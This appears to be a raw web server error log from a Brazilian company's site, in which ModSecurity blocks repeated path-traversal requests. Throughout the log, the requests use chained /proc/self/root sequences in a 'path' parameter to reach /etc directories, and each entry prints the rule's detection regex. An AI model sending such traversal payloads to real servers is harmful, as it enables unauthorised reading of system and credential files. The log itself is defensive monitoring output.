[unique_id "ablOn9CmCSWTlPouqorO-AAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:49.292271 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.243.203:34564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOoat8Nd0UC_OcbVGyEwAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:50.126067 2026] [access_compat:error] [pid 17965:tid 140411574073088] [client 117.210.132.24:51467] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 09:52:50.367468 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.46:60924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOoqt8Nd0UC_OcbVGyFgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:52:50.648419 2026] [:error] [pid 1731:tid 140411666392832] [client 74.7.243.203:58878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOogb2qCuy5irgBMjL5AAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:52.035558 2026] [:error] [pid 1731:tid 140411666392832] [client 74.7.243.203:58886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOpAb2qCuy5irgBMjL5gAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:53.003814 2026] [:error] [pid 1731:tid 140411641214720] [client 74.7.241.46:44070] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOpQb2qCuy5irgBMjL5wAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:52:53.419025 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.203:58896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOpQeiSKl8TjouI-YFPQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:54.799757 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:58900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOpgeiSKl8TjouI-YFQAAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:55.472953 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.241.46:44074] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOp-82sZHvlq4xgHrFxAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:52:56.131303 2026] [:error] [pid 2159:tid 140411565680384] [client 74.7.243.203:58910] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOqPct6CQ8jnRyg2p-5QAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:57.468240 2026] [:error] [pid 2553:tid 140411733534464] [client 74.7.243.203:58914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOqf0Bec_B9OkZP_i_6AAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:57.823584 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.241.46:44076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOqf0Bec_B9OkZP_i_6QAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:52:58.760098 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.243.203:58928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOqqBJNF7axNlVR0X_4AAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:00.089138 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.203:58930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOrAeiSKl8TjouI-YFRAAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:00.185283 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.241.46:50714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOrJDEJR9VXonE_-1ShgAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:53:01.515057 2026] [:error] [pid 1210:tid 140411599251200] [client 74.7.243.203:37682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOrVKJy4A1bGlmj9BYkQAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:03.052252 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.243.203:37686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOr6t8Nd0UC_OcbVGyHAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:04.362911 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.243.203:37700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOsP0Bec_B9OkZP_i_7wAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:05.692163 2026] [:error] [pid 1731:tid 140411708356352] [client 74.7.243.203:37708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOsQb2qCuy5irgBMjL7gAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:09.600310 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.241.46:50730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOte82sZHvlq4xgHrF0gAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:53:17.859351 2026] [:error] [pid 1731:tid 140411708356352] [client 74.7.241.46:44022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOvAb2qCuy5irgBMjL9AAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:53:18.942475 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.243.203:37722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablOvpDEJR9VXonE_-1SlAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
